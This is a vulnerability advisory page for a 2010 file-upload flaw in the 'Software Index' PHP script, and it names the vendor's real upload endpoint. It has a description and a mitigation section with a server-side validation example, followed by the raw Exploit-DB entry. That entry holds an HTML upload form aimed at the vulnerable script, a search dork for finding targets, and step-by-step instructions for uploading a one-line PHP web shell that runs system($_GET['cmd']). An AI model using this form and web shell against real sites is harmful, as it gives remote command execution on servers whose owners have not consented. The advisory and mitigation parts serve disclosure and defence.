Vendor: Software Index
By: indoushka
CVSS: 7.5 (HIGH)
Type: File Upload Vulnerability
CWE: 434
Product Name: Software Index
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
Year: 2010

Bug: Up

A file upload vulnerability allows an attacker to upload malicious files to a web application. It arises where the application exposes an input field that lets users upload files from their local machine to the web server. In this case, the vulnerable endpoint is http://www.p30vel.ir/Software-Index-P30vel.ir/siteadmin/doupload.php, which allows users to upload files with the extensions .php, .png, .bmp, .jpeg, and .gif. An attacker can exploit this vulnerability by uploading a malicious file to the web server, which can then be used to execute arbitrary code on the server.

Mitigation:

To mitigate this vulnerability, the web application should accept only files with specific extensions, and should validate the file type and content before accepting the upload. The web application should also restrict the size of files that can be uploaded.
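
The three checks above, enforced on the server rather than in the form's JavaScript, as an added example (not the vendor's code and not part of the original advisory). The field name userfile and the 1000000-byte limit come from the form shown below; the function name, the constants and the /srv/uploads path are assumptions.

```php
<?php
// Added example: hypothetical server-side check for the form's "userfile" field.
// Function name, constants and destination path are assumptions; needs PHP 7+.

const MAX_UPLOAD_BYTES = 1000000;        // the limit the form only advertises
const ALLOWED_IMAGES = [                 // extension => type getimagesize() must report
    'png'  => IMAGETYPE_PNG,
    'gif'  => IMAGETYPE_GIF,
    'jpg'  => IMAGETYPE_JPEG,
    'jpeg' => IMAGETYPE_JPEG,
    'bmp'  => IMAGETYPE_BMP,
];

function store_image_upload(array $file, string $destDir): string
{
    // Reject failed, multi-file or forged entries before touching the file.
    if (!isset($file['error'], $file['tmp_name'], $file['name'])
        || $file['error'] !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('upload failed');
    }
    // Size is measured on the server; the hidden MAX_FILE_SIZE field is client input.
    $size = filesize($file['tmp_name']);
    if ($size === false || $size === 0 || $size > MAX_UPLOAD_BYTES) {
        throw new RuntimeException('file size not accepted');
    }
    // Exact match on the final extension, so "x.php" and "x.png.php" are refused.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!array_key_exists($ext, ALLOWED_IMAGES)) {
        throw new RuntimeException('extension not accepted');
    }
    // Content check: the header must parse as the image type the extension claims.
    $info = @getimagesize($file['tmp_name']);
    if ($info === false || $info[2] !== ALLOWED_IMAGES[$ext]) {
        throw new RuntimeException('content does not match extension');
    }
    // Server-generated name: nothing from the client reaches the stored path.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], rtrim($destDir, '/') . '/' . $name)) {
        throw new RuntimeException('could not store file');
    }
    return $name;
}

// In the upload handler: $stored = store_image_upload($_FILES['userfile'], '/srv/uploads');
```

getimagesize() inspects only the image header, so the destination directory should also be one where the web server does not execute scripts.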

Exploit-DB raw data:

######################################################################## 

# Vendor: http://www.p30vel.ir/

# Date: 2010-05-27 

# Author : indoushka 

# Thanks to : Inj3ct0r.com,Exploit-DB.com,SecurityReason.com,Hack0wn.com ! 

# Contact : indoushka@hotmail.com 

# Home :

# Bug  : Up

# Tested on : windows SP2 Français V.(Pnx2 2.0) 
######################################################################## 
                                                                                                                               
# Dork : Copyright 2010. Software Index       
                                                                 
# Exploit By indoushka 

	<html>
<head>
<Title>Select Image File for uploading</Title>

<script language="JavaScript">
function checkFile()
{
if (form1.userfile.value == "")
{
alert(" Please choose a file to upload");
return (false);
}
if (form1.userfile.value.indexOf(".php") == -1 &&form1.userfile.value.indexOf(".png") == -1 &&form1.userfile.value.indexOf(".bmp") == -1 &&form1.userfile.value.indexOf(".jpeg") == -1 && form1.userfile.value.indexOf(".gif") == -1)
{
alert(" Please upload .gif/.jpg/.jpeg/.bmp/.png files only");
form1.userfile.value="";
form1.userfile.focus();
return (false);
}
return(true);
}

</script>


</head>

<body>
<b><font size="3">Upload Image</font>.</b> 
<FORM ENCTYPE="multipart/form-data" ACTION="http://127.0.0.1/Software-Index-P30vel.ir/siteadmin/doupload.php?box=<?php echo $_REQUEST["box"]?>&func=2" METHOD=post ID=form1 NAME=form1 onSubmit="javscript:return checkFile(form1);"> 
<input type="hidden" name="id" value="<?php echo $_SESSION[ "username" ] ?>">
<input type="hidden" name="act" value="upload">
<table><tr><td>
<b><font size="3" color="#FFFFFF"><u><font color="#000000" size="2">Attachment</font></u></font></b> 
        <table>
          <tr> 
            <td valign="top" width="15"><font color="#000000">1.</font></td>
            <td width="470"><font color="#000000">To add an Attachment, click 
              the 'Browse' button to select the file to attach, or type the path 
              to the file in the Text-box below.</font></td>
          </tr>
          <tr> 
            <td valign="top" width="15"><font color="#000000">2.</font></td>
            <td width="470"><font color="#000000">Then click Upload button to 
              complete the upload</font></td>
          </tr>
          <tr> 
            <td valign="top" width="15"><font color="#000000">3.</font></td>
            <td width="470"><font color="#990000">NOTE</font><font color="#000000">: 
              The File transfer can take from a few seconds upto a few minutes 
              depending on the size of the attachment. Please be patient while 
              the attachment is being uploaded.</font></td>
          </tr>
          <tr> 
            <td valign="top" width="15"><font color="#000000">4.</font></td>
            <td width="470"><font color="#990000">NOTE</font><font color="#000000">: 
              The File will be renamed if the file with the same name is present</font></td>
          </tr>
        </table>
      </TD>
    </TR> 
<TR><TD><STRONG>Hit the [Browse] button to find the file on your computer.</STRONG><BR></TD></TR> 
<TR><TD><strong>Image</strong>
<INPUT NAME=userfile SIZE=30 TYPE=file   MaxFileSize="1000000"> 
<input type="hidden" name="MAX_FILE_SIZE" value="1000000">
  </TD></TR>
  <TR><TD> </TD></TR>
  <TR><TD><input type="submit" value="Upload" name="uploadfile"></TD></TR>
<TR><TD>NOTE: Please be patient, you will not receive any notification until the 
file is completely transferred.<BR><BR></TD></TR>
</table>

</FORM>

   
<!--
<Script Language="JavaScript">
function listattach(filename)
{
window.opener.document.form123.<?php //request.QueryString("box") ?>.value=filename
window.close()
}
</script>
<Input type=button value=Done onClick="listattach('<?php //echo filename ?>')">
-->

</body>

</html>

1 - Save as php or html and upload to your localhost or server 

2 - use Backdoor 

<?php
$cmd = $_GET['cmd'];
system($cmd);
?>

3 - you see where the file uploaded

Dz-Ghost Team ===== Saoucha * Star08 * Redda * theblind74 * XproratiX * onurozkan * n2n * Meher Assel ===========================
all my friend :
His0k4 * Hussin-X * Rafik * Yashar * SoldierOfAllah * RiskY.HaCK * Stake * r1z * D4NB4R * www.alkrsan.net * MR.SoOoFe * ThE g0bL!N
(cr4wl3r Let the poor live ) * RoAd_KiLlEr * AnGeL25dZ
---------------------------------------------------------------------------------------------------------------------------------